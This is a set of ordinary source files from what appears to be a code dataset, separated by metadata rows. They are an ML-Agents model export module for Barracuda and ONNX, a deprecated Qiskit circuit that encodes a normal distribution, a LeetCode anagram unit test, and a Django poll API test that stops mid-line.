SerializationSettings(NamedTuple): model_path: str brain_name: str convert_to_barracuda: bool = True convert_to_onnx: bool = True onnx_opset: int = 9 def export_policy_model( settings: SerializationSettings, graph: tf.Graph, sess: tf.Session ) -> None: """ Exports latest saved model to .nn format for Unity embedding. 
""" frozen_graph_def = _make_frozen_graph(settings, graph, sess) # Save frozen graph frozen_graph_def_path = settings.model_path + "/frozen_graph_def.pb" with gfile.GFile(frozen_graph_def_path, "wb") as f: f.write(frozen_graph_def.SerializeToString()) # Convert to barracuda if settings.convert_to_barracuda: tf2bc.convert(frozen_graph_def_path, settings.model_path + ".nn") logger.info(f"Exported {settings.model_path}.nn file") # Save to onnx too (if we were able to import it) if ONNX_EXPORT_ENABLED: if settings.convert_to_onnx: try: onnx_graph = convert_frozen_to_onnx(settings, frozen_graph_def) onnx_output_path = settings.model_path + ".onnx" with open(onnx_output_path, "wb") as f: f.write(onnx_graph.SerializeToString()) logger.info(f"Converting to {onnx_output_path}") except Exception: # Make conversion errors fatal depending on environment variables (only done during CI) if _enforce_onnx_conversion(): raise logger.exception( "Exception trying to save ONNX graph. Please report this error on " "https://github.com/Unity-Technologies/ml-agents/issues and " "attach a copy of frozen_graph_def.pb" ) else: if _enforce_onnx_conversion(): raise RuntimeError( "ONNX conversion enforced, but couldn't import dependencies." ) def _make_frozen_graph( settings: SerializationSettings, graph: tf.Graph, sess: tf.Session ) -> tf.GraphDef: with graph.as_default(): target_nodes = ",".join(_process_graph(settings, graph)) graph_def = graph.as_graph_def() output_graph_def = graph_util.convert_variables_to_constants( sess, graph_def, target_nodes.replace(" ", "").split(",") ) return output_graph_def def convert_frozen_to_onnx( settings: SerializationSettings, frozen_graph_def: tf.GraphDef ) -> Any: # This is basically https://github.com/onnx/tensorflow-onnx/blob/master/tf2onnx/convert.py # Some constants in the graph need to be read by the inference system. # These aren't used by the model anywhere, so trying to make sure they propagate # through conversion and import is a losing battle. 
Instead, save them now, # so that we can add them back later. constant_values = {} for n in frozen_graph_def.node: if n.name in MODEL_CONSTANTS: val = n.attr["value"].tensor.int_val[0] constant_values[n.name] = val inputs = _get_input_node_names(frozen_graph_def) outputs = _get_output_node_names(frozen_graph_def) logger.info(f"onnx export - inputs:{inputs} outputs:{outputs}") frozen_graph_def = tf_optimize( inputs, outputs, frozen_graph_def, fold_constant=True ) with tf.Graph().as_default() as tf_graph: tf.import_graph_def(frozen_graph_def, name="") with tf.Session(graph=tf_graph): g = process_tf_graph( tf_graph, input_names=inputs, output_names=outputs, opset=settings.onnx_opset, ) onnx_graph = optimizer.optimize_graph(g) model_proto = onnx_graph.make_model(settings.brain_name) # Save the constant values back the graph initializer. # This will ensure the importer gets them as global constants. constant_nodes = [] for k, v in constant_values.items(): constant_node = _make_onnx_node_for_constant(k, v) constant_nodes.append(constant_node) model_proto.graph.initializer.extend(constant_nodes) return model_proto def _make_onnx_node_for_constant(name: str, value: int) -> Any: tensor_value = onnx.TensorProto( data_type=onnx.TensorProto.INT32, name=name, int32_data=[value], dims=[1, 1, 1, 1], ) return tensor_value def _get_input_node_names(frozen_graph_def: Any) -> List[str]: """ Get the list of input node names from the graph. 
Names are suffixed with ":0" """ node_names = _get_frozen_graph_node_names(frozen_graph_def) input_names = node_names & POSSIBLE_INPUT_NODES # Check visual inputs sequentially, and exit as soon as we don't find one vis_index = 0 while True: vis_node_name = f"{VISUAL_OBSERVATION_PREFIX}{vis_index}" if vis_node_name in node_names: input_names.add(vis_node_name) else: break vis_index += 1 # Append the port return [f"{n}:0" for n in input_names] def _get_output_node_names(frozen_graph_def: Any) -> List[str]: """ Get the list of output node names from the graph. Names are suffixed with ":0" """ node_names = _get_frozen_graph_node_names(frozen_graph_def) output_names = node_names & POSSIBLE_OUTPUT_NODES # Append the port return [f"{n}:0" for n in output_names] def _get_frozen_graph_node_names(frozen_graph_def: Any) -> Set[str]: """ Get all the node names from the graph. """ names = set() for node in frozen_graph_def.node: names.add(node.name) return names def _process_graph(settings: SerializationSettings, graph: tf.Graph) -> List[str]: """ Gets the list of the output nodes present in the graph for inference :return: list of node names """ all_nodes = [x.name for x in graph.as_graph_def().node] nodes = [x for x in all_nodes if x in POSSIBLE_OUTPUT_NODES | MODEL_CONSTANTS] logger.info("List of nodes to export for brain :" + settings.brain_name) for n in nodes: logger.info("\t" + n) return nodes def _enforce_onnx_conversion() -> bool: env_var_name = "TEST_ENFORCE_ONNX_CONVERSION" if env_var_name not in os.environ: return False val = os.environ[env_var_name] try: # This handles e.g. "false" converting reasonably to False return strtobool(val) except Exception: return False
en
0.903528
# Either onnx and tf2onnx not installed, or they're not compatible with the version of tensorflow # ONNX is only tested on 1.12.0 and later Exports latest saved model to .nn format for Unity embedding. # Save frozen graph # Convert to barracuda # Save to onnx too (if we were able to import it) # Make conversion errors fatal depending on environment variables (only done during CI) # This is basically https://github.com/onnx/tensorflow-onnx/blob/master/tf2onnx/convert.py # Some constants in the graph need to be read by the inference system. # These aren't used by the model anywhere, so trying to make sure they propagate # through conversion and import is a losing battle. Instead, save them now, # so that we can add them back later. # Save the constant values back the graph initializer. # This will ensure the importer gets them as global constants. Get the list of input node names from the graph. Names are suffixed with ":0" # Check visual inputs sequentially, and exit as soon as we don't find one # Append the port Get the list of output node names from the graph. Names are suffixed with ":0" # Append the port Get all the node names from the graph. Gets the list of the output nodes present in the graph for inference :return: list of node names # This handles e.g. "false" converting reasonably to False
2.005637
2
qiskit/circuit/library/probability_distributions/normal.py
Elliot-Coupe/qiskit-terra
1
6627898
# This code is part of Qiskit. # # (C) Copyright IBM 2017, 2020. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """A circuit that encodes a discretized normal probability distribution in qubit amplitudes.""" from typing import Tuple, Union, List, Optional import warnings import numpy as np from qiskit.circuit import QuantumCircuit from qiskit.exceptions import QiskitError class NormalDistribution(QuantumCircuit): r"""A circuit to encode a discretized normal distribution in qubit amplitudes. The probability density function of the normal distribution is defined as .. math:: \mathbb{P}(X = x) = \frac{1}{\sqrt{2\pi\sigma^2}} e^{-\frac{(x - \mu)^2}{\sigma^2}} .. note:: The parameter ``sigma`` in this class equals the **variance**, :math:`\sigma^2` and not the standard deviation. This is for consistency with multivariate distributions, where the uppercase sigma, :math:`\Sigma`, is associated with the covariance. This circuit considers the discretized version of the normal distribution on ``2 ** num_qubits`` equidistant points, :math:`x_i`, truncated to ``bounds``. For a one-dimensional random variable, meaning `num_qubits` is a single integer, it applies the operation .. math:: \mathcal{P}_X |0\rangle^n = \sum_{i=0}^{2^n - 1} \sqrt{\mathbb{P}(x_i)} |i\rangle where :math:`n` is `num_qubits`. .. note:: The circuit loads the **square root** of the probabilities into the qubit amplitudes such that the sampling probability, which is the square of the amplitude, equals the probability of the distribution. In the multi-dimensional case, the distribution is defined as .. 
math:: \mathbb{P}(X = x) = \frac{\Sigma^{-1}}{\sqrt{2\pi}} e^{-\frac{(x - \mu)^2}{\Sigma}} where :math:`\Sigma` is the covariance. To specify a multivariate normal distribution, ``num_qubits`` is a list of integers, each specifying how many qubits are used to discretize the respective dimension. The arguments ``mu`` and ``sigma`` in this case are a vector and square matrix. If for instance, ``num_qubits = [2, 3]`` then ``mu`` is a 2d vector and ``sigma`` is the :math:`2 \times 2` covariance matrix. The first dimension is discretized using 2 qubits, hence on 4 points, and the second dimension on 3 qubits, hence 8 points. Therefore the random variable is discretized on :math:`4 \times 8 = 32` points. Since, in general, it is not yet known how to efficiently prepare the qubit amplitudes to represent a normal distribution, this class computes the expected amplitudes and then uses the ``QuantumCircuit.initialize`` method to construct the corresponding circuit. This circuit is for example used in amplitude estimation applications, such as finance [1, 2], where customer demand or the return of a portfolio could be modelled using a normal distribution. Examples: >>> circuit = NormalDistribution(3, mu=1, sigma=1, bounds=(0, 2)) >>> circuit.draw() ┌────────────────────────────────────────────────────────────────────────────┐ q_0: ┤0 ├ │ │ q_1: ┤1 initialize(0.30391,0.3435,0.37271,0.38824,0.38824,0.37271,0.3435,0.30391) ├ │ │ q_2: ┤2 ├ └────────────────────────────────────────────────────────────────────────────┘ >>> mu = [1, 0.9] >>> sigma = [[1, -0.2], [-0.2, 1]] >>> circuit = NormalDistribution([2, 3], mu, sigma) >>> circuit.num_qubits 5 >>> from qiskit import QuantumCircuit >>> mu = [1, 0.9] >>> sigma = [[1, -0.2], [-0.2, 1]] >>> bounds = [(0, 1), (-1, 1)] >>> p_x = NormalDistribution([2, 3], mu, sigma, bounds) >>> circuit = QuantumCircuit(6) >>> circuit.append(p_x, list(range(5))) >>> for i in range(5): ... 
circuit.cry(2 ** i, i, 5) >>> circuit.draw() ┌───────┐ q_0: ┤0 ├────■───────────────────────────────────────── │ │ │ q_1: ┤1 ├────┼────────■──────────────────────────────── │ │ │ │ q_2: ┤2 P(X) ├────┼────────┼────────■─────────────────────── │ │ │ │ │ q_3: ┤3 ├────┼────────┼────────┼────────■────────────── │ │ │ │ │ │ q_4: ┤4 ├────┼────────┼────────┼────────┼────────■───── └───────┘┌───┴───┐┌───┴───┐┌───┴───┐┌───┴───┐┌───┴────┐ q_5: ─────────┤ RY(1) ├┤ RY(2) ├┤ RY(4) ├┤ RY(8) ├┤ RY(16) ├ └───────┘└───────┘└───────┘└───────┘└────────┘ References: [1]: <NAME>., <NAME>., & <NAME>. (2020). Quantum-Enhanced Simulation-Based Optimization. `arXiv:2005.10780 <http://arxiv.org/abs/2005.10780>`_ [2]: <NAME>., & <NAME>. J. (2018). Quantum Risk Analysis. `arXiv:1806.06893 <http://arxiv.org/abs/1806.06893>`_ """ def __init__( self, num_qubits: Union[int, List[int]], mu: Optional[Union[float, List[float]]] = None, sigma: Optional[Union[float, List[float]]] = None, bounds: Optional[Union[Tuple[float, float], List[Tuple[float, float]]]] = None, upto_diag: bool = False, name: str = "P(X)", ) -> None: r""" Args: num_qubits: The number of qubits used to discretize the random variable. For a 1d random variable, ``num_qubits`` is an integer, for multiple dimensions a list of integers indicating the number of qubits to use in each dimension. mu: The parameter :math:`\mu`, which is the expected value of the distribution. Can be either a float for a 1d random variable or a list of floats for a higher dimensional random variable. Defaults to 0. sigma: The parameter :math:`\sigma^2` or :math:`\Sigma`, which is the variance or covariance matrix. Default to the identity matrix of appropriate size. bounds: The truncation bounds of the distribution as tuples. For multiple dimensions, ``bounds`` is a list of tuples ``[(low0, high0), (low1, high1), ...]``. If ``None``, the bounds are set to ``(-1, 1)`` for each dimension. 
upto_diag: If True, load the square root of the probabilities up to multiplication with a diagonal for a more efficient circuit. name: The name of the circuit. """ warnings.warn( "`NormalDistribution` is deprecated as of version 0.17.0 and will be " "removed no earlier than 3 months after the release date. " "It moved to qiskit_finance.circuit.library.NormalDistribution.", DeprecationWarning, stacklevel=2, ) _check_dimensions_match(num_qubits, mu, sigma, bounds) _check_bounds_valid(bounds) # set default arguments dim = 1 if isinstance(num_qubits, int) else len(num_qubits) if mu is None: mu = 0 if dim == 1 else [0] * dim if sigma is None: sigma = 1 if dim == 1 else np.eye(dim) if bounds is None: bounds = (-1, 1) if dim == 1 else [(-1, 1)] * dim if not isinstance(num_qubits, list): # univariate case circuit = QuantumCircuit(num_qubits, name=name) x = np.linspace(bounds[0], bounds[1], num=2 ** num_qubits) else: # multivariate case circuit = QuantumCircuit(sum(num_qubits), name=name) # compute the evaluation points using numpy's meshgrid # indexing 'ij' yields the "column-based" indexing meshgrid = np.meshgrid( *( np.linspace(bound[0], bound[1], num=2 ** num_qubits[i]) for i, bound in enumerate(bounds) ), indexing="ij", ) # flatten into a list of points x = list(zip(*(grid.flatten() for grid in meshgrid))) from scipy.stats import multivariate_normal # compute the normalized, truncated probabilities probabilities = multivariate_normal.pdf(x, mu, sigma) normalized_probabilities = probabilities / np.sum(probabilities) # store the values, probabilities and bounds to make them user accessible self._values = x self._probabilities = normalized_probabilities self._bounds = bounds # use default the isometry (or initialize w/o resets) algorithm to construct the circuit # pylint: disable=no-member if upto_diag: circuit.isometry(np.sqrt(normalized_probabilities), circuit.qubits, None) else: from qiskit.extensions import Initialize # pylint: disable=cyclic-import initialize = 
Initialize(np.sqrt(normalized_probabilities)) distribution = initialize.gates_to_uncompute().inverse() circuit.compose(distribution, inplace=True) super().__init__(*circuit.qregs, name=name) try: instr = circuit.to_gate() except QiskitError: instr = circuit.to_instruction() self.compose(instr, qubits=self.qubits, inplace=True) @property def values(self) -> np.ndarray: """Return the discretized points of the random variable.""" return self._values @property def probabilities(self) -> np.ndarray: """Return the sampling probabilities for the values.""" return self._probabilities @property def bounds(self) -> Union[Tuple[float, float], List[Tuple[float, float]]]: """Return the bounds of the probability distribution.""" return self._bounds def _check_dimensions_match(num_qubits, mu, sigma, bounds): num_qubits = [num_qubits] if not isinstance(num_qubits, (list, np.ndarray)) else num_qubits dim = len(num_qubits) if mu is not None: mu = [mu] if not isinstance(mu, (list, np.ndarray)) else mu if len(mu) != dim: raise ValueError( "Dimension of mu ({}) does not match the dimension of the " "random variable specified by the number of qubits ({})" "".format(len(mu), dim) ) if sigma is not None: sigma = [[sigma]] if not isinstance(sigma, (list, np.ndarray)) else sigma if len(sigma) != dim or len(sigma[0]) != dim: raise ValueError( "Dimension of sigma ({} x {}) does not match the dimension of " "the random variable specified by the number of qubits ({})" "".format(len(sigma), len(sigma[0]), dim) ) if bounds is not None: # bit differently to cover the case the users might pass `bounds` as a single list, # e.g. 
[0, 1], instead of a tuple bounds = [bounds] if not isinstance(bounds[0], tuple) else bounds if len(bounds) != dim: raise ValueError( "Dimension of bounds ({}) does not match the dimension of the " "random variable specified by the number of qubits ({})" "".format(len(bounds), dim) ) def _check_bounds_valid(bounds): if bounds is None: return bounds = [bounds] if not isinstance(bounds[0], tuple) else bounds for i, bound in enumerate(bounds): if not bound[1] - bound[0] > 0: raise ValueError( "Dimension {} of the bounds are invalid, must be a non-empty " "interval where the lower bounds is smaller than the upper bound." "".format(i) )
# This code is part of Qiskit. # # (C) Copyright IBM 2017, 2020. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """A circuit that encodes a discretized normal probability distribution in qubit amplitudes.""" from typing import Tuple, Union, List, Optional import warnings import numpy as np from qiskit.circuit import QuantumCircuit from qiskit.exceptions import QiskitError class NormalDistribution(QuantumCircuit): r"""A circuit to encode a discretized normal distribution in qubit amplitudes. The probability density function of the normal distribution is defined as .. math:: \mathbb{P}(X = x) = \frac{1}{\sqrt{2\pi\sigma^2}} e^{-\frac{(x - \mu)^2}{\sigma^2}} .. note:: The parameter ``sigma`` in this class equals the **variance**, :math:`\sigma^2` and not the standard deviation. This is for consistency with multivariate distributions, where the uppercase sigma, :math:`\Sigma`, is associated with the covariance. This circuit considers the discretized version of the normal distribution on ``2 ** num_qubits`` equidistant points, :math:`x_i`, truncated to ``bounds``. For a one-dimensional random variable, meaning `num_qubits` is a single integer, it applies the operation .. math:: \mathcal{P}_X |0\rangle^n = \sum_{i=0}^{2^n - 1} \sqrt{\mathbb{P}(x_i)} |i\rangle where :math:`n` is `num_qubits`. .. note:: The circuit loads the **square root** of the probabilities into the qubit amplitudes such that the sampling probability, which is the square of the amplitude, equals the probability of the distribution. In the multi-dimensional case, the distribution is defined as .. 
math:: \mathbb{P}(X = x) = \frac{\Sigma^{-1}}{\sqrt{2\pi}} e^{-\frac{(x - \mu)^2}{\Sigma}} where :math:`\Sigma` is the covariance. To specify a multivariate normal distribution, ``num_qubits`` is a list of integers, each specifying how many qubits are used to discretize the respective dimension. The arguments ``mu`` and ``sigma`` in this case are a vector and square matrix. If for instance, ``num_qubits = [2, 3]`` then ``mu`` is a 2d vector and ``sigma`` is the :math:`2 \times 2` covariance matrix. The first dimension is discretized using 2 qubits, hence on 4 points, and the second dimension on 3 qubits, hence 8 points. Therefore the random variable is discretized on :math:`4 \times 8 = 32` points. Since, in general, it is not yet known how to efficiently prepare the qubit amplitudes to represent a normal distribution, this class computes the expected amplitudes and then uses the ``QuantumCircuit.initialize`` method to construct the corresponding circuit. This circuit is for example used in amplitude estimation applications, such as finance [1, 2], where customer demand or the return of a portfolio could be modelled using a normal distribution. Examples: >>> circuit = NormalDistribution(3, mu=1, sigma=1, bounds=(0, 2)) >>> circuit.draw() ┌────────────────────────────────────────────────────────────────────────────┐ q_0: ┤0 ├ │ │ q_1: ┤1 initialize(0.30391,0.3435,0.37271,0.38824,0.38824,0.37271,0.3435,0.30391) ├ │ │ q_2: ┤2 ├ └────────────────────────────────────────────────────────────────────────────┘ >>> mu = [1, 0.9] >>> sigma = [[1, -0.2], [-0.2, 1]] >>> circuit = NormalDistribution([2, 3], mu, sigma) >>> circuit.num_qubits 5 >>> from qiskit import QuantumCircuit >>> mu = [1, 0.9] >>> sigma = [[1, -0.2], [-0.2, 1]] >>> bounds = [(0, 1), (-1, 1)] >>> p_x = NormalDistribution([2, 3], mu, sigma, bounds) >>> circuit = QuantumCircuit(6) >>> circuit.append(p_x, list(range(5))) >>> for i in range(5): ... 
circuit.cry(2 ** i, i, 5) >>> circuit.draw() ┌───────┐ q_0: ┤0 ├────■───────────────────────────────────────── │ │ │ q_1: ┤1 ├────┼────────■──────────────────────────────── │ │ │ │ q_2: ┤2 P(X) ├────┼────────┼────────■─────────────────────── │ │ │ │ │ q_3: ┤3 ├────┼────────┼────────┼────────■────────────── │ │ │ │ │ │ q_4: ┤4 ├────┼────────┼────────┼────────┼────────■───── └───────┘┌───┴───┐┌───┴───┐┌───┴───┐┌───┴───┐┌───┴────┐ q_5: ─────────┤ RY(1) ├┤ RY(2) ├┤ RY(4) ├┤ RY(8) ├┤ RY(16) ├ └───────┘└───────┘└───────┘└───────┘└────────┘ References: [1]: <NAME>., <NAME>., & <NAME>. (2020). Quantum-Enhanced Simulation-Based Optimization. `arXiv:2005.10780 <http://arxiv.org/abs/2005.10780>`_ [2]: <NAME>., & <NAME>. J. (2018). Quantum Risk Analysis. `arXiv:1806.06893 <http://arxiv.org/abs/1806.06893>`_ """ def __init__( self, num_qubits: Union[int, List[int]], mu: Optional[Union[float, List[float]]] = None, sigma: Optional[Union[float, List[float]]] = None, bounds: Optional[Union[Tuple[float, float], List[Tuple[float, float]]]] = None, upto_diag: bool = False, name: str = "P(X)", ) -> None: r""" Args: num_qubits: The number of qubits used to discretize the random variable. For a 1d random variable, ``num_qubits`` is an integer, for multiple dimensions a list of integers indicating the number of qubits to use in each dimension. mu: The parameter :math:`\mu`, which is the expected value of the distribution. Can be either a float for a 1d random variable or a list of floats for a higher dimensional random variable. Defaults to 0. sigma: The parameter :math:`\sigma^2` or :math:`\Sigma`, which is the variance or covariance matrix. Default to the identity matrix of appropriate size. bounds: The truncation bounds of the distribution as tuples. For multiple dimensions, ``bounds`` is a list of tuples ``[(low0, high0), (low1, high1), ...]``. If ``None``, the bounds are set to ``(-1, 1)`` for each dimension. 
upto_diag: If True, load the square root of the probabilities up to multiplication with a diagonal for a more efficient circuit. name: The name of the circuit. """ warnings.warn( "`NormalDistribution` is deprecated as of version 0.17.0 and will be " "removed no earlier than 3 months after the release date. " "It moved to qiskit_finance.circuit.library.NormalDistribution.", DeprecationWarning, stacklevel=2, ) _check_dimensions_match(num_qubits, mu, sigma, bounds) _check_bounds_valid(bounds) # set default arguments dim = 1 if isinstance(num_qubits, int) else len(num_qubits) if mu is None: mu = 0 if dim == 1 else [0] * dim if sigma is None: sigma = 1 if dim == 1 else np.eye(dim) if bounds is None: bounds = (-1, 1) if dim == 1 else [(-1, 1)] * dim if not isinstance(num_qubits, list): # univariate case circuit = QuantumCircuit(num_qubits, name=name) x = np.linspace(bounds[0], bounds[1], num=2 ** num_qubits) else: # multivariate case circuit = QuantumCircuit(sum(num_qubits), name=name) # compute the evaluation points using numpy's meshgrid # indexing 'ij' yields the "column-based" indexing meshgrid = np.meshgrid( *( np.linspace(bound[0], bound[1], num=2 ** num_qubits[i]) for i, bound in enumerate(bounds) ), indexing="ij", ) # flatten into a list of points x = list(zip(*(grid.flatten() for grid in meshgrid))) from scipy.stats import multivariate_normal # compute the normalized, truncated probabilities probabilities = multivariate_normal.pdf(x, mu, sigma) normalized_probabilities = probabilities / np.sum(probabilities) # store the values, probabilities and bounds to make them user accessible self._values = x self._probabilities = normalized_probabilities self._bounds = bounds # use default the isometry (or initialize w/o resets) algorithm to construct the circuit # pylint: disable=no-member if upto_diag: circuit.isometry(np.sqrt(normalized_probabilities), circuit.qubits, None) else: from qiskit.extensions import Initialize # pylint: disable=cyclic-import initialize = 
Initialize(np.sqrt(normalized_probabilities)) distribution = initialize.gates_to_uncompute().inverse() circuit.compose(distribution, inplace=True) super().__init__(*circuit.qregs, name=name) try: instr = circuit.to_gate() except QiskitError: instr = circuit.to_instruction() self.compose(instr, qubits=self.qubits, inplace=True) @property def values(self) -> np.ndarray: """Return the discretized points of the random variable.""" return self._values @property def probabilities(self) -> np.ndarray: """Return the sampling probabilities for the values.""" return self._probabilities @property def bounds(self) -> Union[Tuple[float, float], List[Tuple[float, float]]]: """Return the bounds of the probability distribution.""" return self._bounds def _check_dimensions_match(num_qubits, mu, sigma, bounds): num_qubits = [num_qubits] if not isinstance(num_qubits, (list, np.ndarray)) else num_qubits dim = len(num_qubits) if mu is not None: mu = [mu] if not isinstance(mu, (list, np.ndarray)) else mu if len(mu) != dim: raise ValueError( "Dimension of mu ({}) does not match the dimension of the " "random variable specified by the number of qubits ({})" "".format(len(mu), dim) ) if sigma is not None: sigma = [[sigma]] if not isinstance(sigma, (list, np.ndarray)) else sigma if len(sigma) != dim or len(sigma[0]) != dim: raise ValueError( "Dimension of sigma ({} x {}) does not match the dimension of " "the random variable specified by the number of qubits ({})" "".format(len(sigma), len(sigma[0]), dim) ) if bounds is not None: # bit differently to cover the case the users might pass `bounds` as a single list, # e.g. 
[0, 1], instead of a tuple bounds = [bounds] if not isinstance(bounds[0], tuple) else bounds if len(bounds) != dim: raise ValueError( "Dimension of bounds ({}) does not match the dimension of the " "random variable specified by the number of qubits ({})" "".format(len(bounds), dim) ) def _check_bounds_valid(bounds): if bounds is None: return bounds = [bounds] if not isinstance(bounds[0], tuple) else bounds for i, bound in enumerate(bounds): if not bound[1] - bound[0] > 0: raise ValueError( "Dimension {} of the bounds are invalid, must be a non-empty " "interval where the lower bounds is smaller than the upper bound." "".format(i) )
en
0.652994
# This code is part of Qiskit. # # (C) Copyright IBM 2017, 2020. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. A circuit that encodes a discretized normal probability distribution in qubit amplitudes. A circuit to encode a discretized normal distribution in qubit amplitudes. The probability density function of the normal distribution is defined as .. math:: \mathbb{P}(X = x) = \frac{1}{\sqrt{2\pi\sigma^2}} e^{-\frac{(x - \mu)^2}{\sigma^2}} .. note:: The parameter ``sigma`` in this class equals the **variance**, :math:`\sigma^2` and not the standard deviation. This is for consistency with multivariate distributions, where the uppercase sigma, :math:`\Sigma`, is associated with the covariance. This circuit considers the discretized version of the normal distribution on ``2 ** num_qubits`` equidistant points, :math:`x_i`, truncated to ``bounds``. For a one-dimensional random variable, meaning `num_qubits` is a single integer, it applies the operation .. math:: \mathcal{P}_X |0\rangle^n = \sum_{i=0}^{2^n - 1} \sqrt{\mathbb{P}(x_i)} |i\rangle where :math:`n` is `num_qubits`. .. note:: The circuit loads the **square root** of the probabilities into the qubit amplitudes such that the sampling probability, which is the square of the amplitude, equals the probability of the distribution. In the multi-dimensional case, the distribution is defined as .. math:: \mathbb{P}(X = x) = \frac{\Sigma^{-1}}{\sqrt{2\pi}} e^{-\frac{(x - \mu)^2}{\Sigma}} where :math:`\Sigma` is the covariance. 
To specify a multivariate normal distribution, ``num_qubits`` is a list of integers, each specifying how many qubits are used to discretize the respective dimension. The arguments ``mu`` and ``sigma`` in this case are a vector and square matrix. If for instance, ``num_qubits = [2, 3]`` then ``mu`` is a 2d vector and ``sigma`` is the :math:`2 \times 2` covariance matrix. The first dimension is discretized using 2 qubits, hence on 4 points, and the second dimension on 3 qubits, hence 8 points. Therefore the random variable is discretized on :math:`4 \times 8 = 32` points. Since, in general, it is not yet known how to efficiently prepare the qubit amplitudes to represent a normal distribution, this class computes the expected amplitudes and then uses the ``QuantumCircuit.initialize`` method to construct the corresponding circuit. This circuit is for example used in amplitude estimation applications, such as finance [1, 2], where customer demand or the return of a portfolio could be modelled using a normal distribution. Examples: >>> circuit = NormalDistribution(3, mu=1, sigma=1, bounds=(0, 2)) >>> circuit.draw() ┌────────────────────────────────────────────────────────────────────────────┐ q_0: ┤0 ├ │ │ q_1: ┤1 initialize(0.30391,0.3435,0.37271,0.38824,0.38824,0.37271,0.3435,0.30391) ├ │ │ q_2: ┤2 ├ └────────────────────────────────────────────────────────────────────────────┘ >>> mu = [1, 0.9] >>> sigma = [[1, -0.2], [-0.2, 1]] >>> circuit = NormalDistribution([2, 3], mu, sigma) >>> circuit.num_qubits 5 >>> from qiskit import QuantumCircuit >>> mu = [1, 0.9] >>> sigma = [[1, -0.2], [-0.2, 1]] >>> bounds = [(0, 1), (-1, 1)] >>> p_x = NormalDistribution([2, 3], mu, sigma, bounds) >>> circuit = QuantumCircuit(6) >>> circuit.append(p_x, list(range(5))) >>> for i in range(5): ... 
circuit.cry(2 ** i, i, 5) >>> circuit.draw() ┌───────┐ q_0: ┤0 ├────■───────────────────────────────────────── │ │ │ q_1: ┤1 ├────┼────────■──────────────────────────────── │ │ │ │ q_2: ┤2 P(X) ├────┼────────┼────────■─────────────────────── │ │ │ │ │ q_3: ┤3 ├────┼────────┼────────┼────────■────────────── │ │ │ │ │ │ q_4: ┤4 ├────┼────────┼────────┼────────┼────────■───── └───────┘┌───┴───┐┌───┴───┐┌───┴───┐┌───┴───┐┌───┴────┐ q_5: ─────────┤ RY(1) ├┤ RY(2) ├┤ RY(4) ├┤ RY(8) ├┤ RY(16) ├ └───────┘└───────┘└───────┘└───────┘└────────┘ References: [1]: <NAME>., <NAME>., & <NAME>. (2020). Quantum-Enhanced Simulation-Based Optimization. `arXiv:2005.10780 <http://arxiv.org/abs/2005.10780>`_ [2]: <NAME>., & <NAME>. J. (2018). Quantum Risk Analysis. `arXiv:1806.06893 <http://arxiv.org/abs/1806.06893>`_ Args: num_qubits: The number of qubits used to discretize the random variable. For a 1d random variable, ``num_qubits`` is an integer, for multiple dimensions a list of integers indicating the number of qubits to use in each dimension. mu: The parameter :math:`\mu`, which is the expected value of the distribution. Can be either a float for a 1d random variable or a list of floats for a higher dimensional random variable. Defaults to 0. sigma: The parameter :math:`\sigma^2` or :math:`\Sigma`, which is the variance or covariance matrix. Default to the identity matrix of appropriate size. bounds: The truncation bounds of the distribution as tuples. For multiple dimensions, ``bounds`` is a list of tuples ``[(low0, high0), (low1, high1), ...]``. If ``None``, the bounds are set to ``(-1, 1)`` for each dimension. upto_diag: If True, load the square root of the probabilities up to multiplication with a diagonal for a more efficient circuit. name: The name of the circuit. 
# set default arguments # univariate case # multivariate case # compute the evaluation points using numpy's meshgrid # indexing 'ij' yields the "column-based" indexing # flatten into a list of points # compute the normalized, truncated probabilities # store the values, probabilities and bounds to make them user accessible # use default the isometry (or initialize w/o resets) algorithm to construct the circuit # pylint: disable=no-member # pylint: disable=cyclic-import Return the discretized points of the random variable. Return the sampling probabilities for the values. Return the bounds of the probability distribution. # bit differently to cover the case the users might pass `bounds` as a single list, # e.g. [0, 1], instead of a tuple
3.175323
3
exercises/0242-ValidAnagram/valid_anagram_test.py
tqa236/leetcode-solutions
1
6627899
<reponame>tqa236/leetcode-solutions<gh_stars>1-10 import unittest from valid_anagram import Solution class Test(unittest.TestCase): def test_1(self): solution = Solution() self.assertEqual(solution.isAnagram("anagram", "nagaram"), True) def test_2(self): solution = Solution() self.assertEqual(solution.isAnagram("rat", "car"), False) if __name__ == "__main__": unittest.main()
import unittest from valid_anagram import Solution class Test(unittest.TestCase): def test_1(self): solution = Solution() self.assertEqual(solution.isAnagram("anagram", "nagaram"), True) def test_2(self): solution = Solution() self.assertEqual(solution.isAnagram("rat", "car"), False) if __name__ == "__main__": unittest.main()
none
1
3.362917
3
backend/app/tests/test_pollView.py
ExZos/Mound
0
6627900
from django.test import TestCase from rest_framework import status from rest_framework.test import APIClient class getPendingPollsInSpaceTests(TestCase): client = APIClient() @classmethod def setUpTestData(self): self.client.post('/api/spaces/', {'name': 'Home'}, format='json') self.client.post('/api/spaces/', {'name': 'Work'}, format='json') self.client.post('/api/spaces/', {'name': 'School'}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 1}, format='json') self.client.post('/api/polls/', {'space': 2, 'status': True}, format='json') self.client.post('/api/polls/', {'space': 2, 'status': True}, format='json') self.client.post('/api/polls/', {'space': 3}, format='json') self.client.post('/api/polls/', {'space': 3, 'status': True}, format='json') self.client.post('/api/polls/', {'space': 3, 'status': False}, format='json') def test_get_from_space_w_2_pending_polls(self): response = self.client.get('/poll/getPendingInSpace/1/') self.assertEqual(len(response.data), 2) def test_get_from_space_w_no_pending_polls(self): response = self.client.get('/poll/getPendingInSpace/2/') self.assertEqual(len(response.data), 0) def test_get_from_space_w_1_pending_poll(self): response = self.client.get('/poll/getPendingInSpace/3/') self.assertEqual(len(response.data), 1) def test_get_from_missing_space(self): response = 